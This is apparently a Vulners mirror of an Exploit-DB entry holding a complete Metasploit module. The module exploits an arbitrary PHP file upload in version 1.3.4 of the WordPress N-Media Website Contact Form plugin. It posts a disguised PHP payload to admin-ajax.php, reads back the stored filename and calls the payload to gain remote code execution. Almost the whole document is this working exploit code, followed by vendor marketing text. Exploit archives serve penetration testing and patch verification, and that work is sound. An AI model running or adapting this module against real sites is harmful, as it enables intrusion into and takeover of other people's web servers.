Lucene search
K

WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)

🗓️ 21 Apr 2015 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 21 Views

Exploits arbitrary file upload in WordPress N-Media Website Contact Form plugin, version 1.3.4 for remote code executio

Code
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress N-Media Website Contact Form Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the WordPress N-Media Website Contact Form
        plugin, version 1.3.4. The vulnerability allows for arbitrary file upload and remote code execution.
      },
      'Author'         =>
        [
          'Claudio Viviani', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['URL', 'http://www.homelab.it/index.php/2015/04/12/wordpress-n-media-website-contact-form-shell-upload/'],
          ['WPVDB', '7896']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['N-Media WebSite Contact Form 1.3.4', {}]],
      'DisclosureDate' => 'Apr 12 2015',
      'DefaultTarget'  => 0)
    )
  end

  def check
    check_plugin_version_from_readme('website-contact-form-with-file-upload', '1.5')
  end

  def exploit
    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'

    data = Rex::MIME::Message.new
    data.add_part('upload', nil, nil, 'form-data; name="action"')
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{php_pagename}\"")
    data.add_part('nm_webcontact_upload_file', nil, nil, 'form-data; name="action"')
    post_data = data.to_s

    res = send_request_cgi({
      'uri'       => wordpress_url_admin_ajax,
      'method'    => 'POST',
      'ctype'     => "multipart/form-data; boundary=#{data.bound}",
      'data'      => post_data
    })

    if res
      if res.code == 200 && res.body =~ /filename/
        begin
          new_php_pagename = JSON.parse(res.body)["filename"]
        rescue JSON::ParserError
          fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename')
        end
        print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...")
        register_files_for_cleanup(new_php_pagename)
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown,'ERROR')
    end

    print_status("#{peer} - Calling payload...")
    send_request_cgi(
      'uri'       => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename)
    )
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation